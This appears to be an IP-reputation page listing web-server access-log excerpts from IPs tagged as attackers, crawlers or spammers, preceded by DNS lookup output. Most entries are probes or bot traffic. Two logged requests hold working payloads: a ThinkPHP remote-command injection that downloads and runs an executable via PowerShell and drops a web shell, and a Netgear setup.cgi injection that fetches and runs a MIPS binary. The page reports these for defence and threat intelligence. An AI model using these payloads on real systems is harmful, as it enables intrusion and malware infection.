City: unknown
Region: unknown
Country: United States of America (the)
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 6.162.26.70
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 30981
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;6.162.26.70. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025020602 1800 900 604800 86400
;; Query time: 34 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 07 06:04:36 CST 2025
;; MSG SIZE rcvd: 104Host 70.26.162.6.in-addr.arpa not found: 5(REFUSED)
server can't find 6.162.26.70.in-addr.arpa: SERVFAIL| IP | Type | Details | Datetime |
|---|---|---|---|
| 77.1.146.159 | attack | 77.1.146.159 - - [05/Apr/2019:20:16:40 +0800] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 77.1.146.159 - - [05/Apr/2019:20:16:41 +0800] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 77.1.146.159 - - [05/Apr/2019:20:16:41 +0800] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 77.1.146.159 - - [05/Apr/2019:20:16:43 +0800] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-05 20:21:20 |
| 42.156.136.98 | bots | YisouSpider 就是神马搜索的爬虫 42.156.136.98 - - [29/Mar/2019:08:27:04 +0800] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.1.1 HTTP/1.1" 200 8104 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safa ri/537.36" |
2019-03-29 09:13:21 |
| 87.106.34.39 | attack | 87.106.34.39 - - [03/Apr/2019:08:15:20 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" |
2019-04-03 08:18:07 |
| 118.25.71.65 | attack | 攻击型IP
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-03-31 17:58:18 |
| 118.25.49.95 | attack | 118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 400 682 "http://118.25.52.138:443/struts2-rest-showcase/orders.xhtml" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /index.action HTTP/1.1" 400 682 "http://118.25.52.138:443/index.action" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /index.do HTTP/1.1" 400 682 "http://118.25.52.138:443/index.do" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-01 11:50:45 |
| 115.87.27.91 | attack | 115.87.27.91 - - [04/Apr/2019:18:44:53 +0800] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-04 18:46:39 |
| 46.119.126.51 | spam | 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://jav-fetish.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://gidonline.one/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://gidonline.one/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://jav-fetish.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:50 +0800] "GET / HTTP/1.1" 301 228 "https://gidonline.one/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:50 +0800] "GET / HTTP/1.1" 301 228 "https://jav-fetish.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" |
2019-04-03 16:42:55 |
| 212.156.221.177 | attack | 212.156.221.177 - - [02/Apr/2019:12:04:50 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://174.138.11.85/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-" |
2019-04-02 12:05:51 |
| 176.223.125.207 | attack | 攻击IP 176.223.125.207 - - [29/Mar/2019:14:34:14 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" |
2019-03-29 14:37:20 |
| 84.222.144.104 | attack | wordpress 暴力登录 84.222.144.104 - - [28/Mar/2019:17:34:34 +0800] "GET /wp-login.php HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 84.222.144.104 - - [28/Mar/2019:17:34:34 +0800] "GET /wp-login.php HTTP/1.1" 200 7978 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 84.222.144.104 - - [28/Mar/2019:17:34:34 +0800] "GET / HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 84.222.144.104 - - [28/Mar/2019:17:34:35 +0800] "GET / HTTP/1.1" 200 102795 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" |
2019-03-28 17:40:33 |
| 46.37.12.23 | attack | 46.37.12.23 - - [01/Apr/2019:09:07:28 +0800] "GET /admin//config.php HTTP/1.1" 404 232 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5" |
2019-04-01 09:08:57 |
| 178.154.244.50 | bots | yandexbot 178.154.244.50 - - [03/Apr/2019:08:12:31 +0800] "GET /index.php/author/admin/page/3113/ HTTP/1.1" 200 21832 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 178.154.244.50 - - [03/Apr/2019:08:12:33 +0800] "GET /index.php/page/982/ HTTP/1.1" 200 17713 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" |
2019-04-03 08:16:17 |
| 80.82.77.33 | bots | 80.82.77.33 - - [05/Apr/2019:13:44:18 +0800] "GET / HTTP/1.1" 200 10269 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" 80.82.77.33 - - [05/Apr/2019:13:44:24 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:32 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:32 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:35 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:38 +0800] "quit" 400 182 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:41 +0800] "GET /robots.txt HTTP/1.1" 200 292 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:45 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 232 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:45 +0800] "GET /sitemap.xml HTTP/1.1" 200 1425241 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:46 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "python-requests/2.13.0" 80.82.77.33 - - [05/Apr/2019:13:44:47 +0800] "" 400 0 "-" "-" |
2019-04-05 13:47:49 |
| 180.153.234.234 | bots | 360爬虫列表
180.153.232.*
180.153.234.*
180.153.236.*
180.163.220.*
42.236.101.*
42.236.102.*
42.236.103.*
42.236.10.*
42.236.12.*
42.236.13.*
42.236.14.*
42.236.15.*
42.236.16.*
42.236.17.*
42.236.46.*
42.236.48.*
42.236.49.*
42.236.50.*
42.236.51.*
42.236.52.*
42.236.53.*
42.236.54.*
42.236.55.*
42.236.99.* |
2019-03-28 20:23:09 |
| 123.190.159.103 | attack | 垃圾IP攻击型 123.190.159.103 - - [31/Mar/2019:21:47:14 +0800] "GET /otsmobile/app/mds/mgw.htm HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" |
2019-03-31 21:50:23 |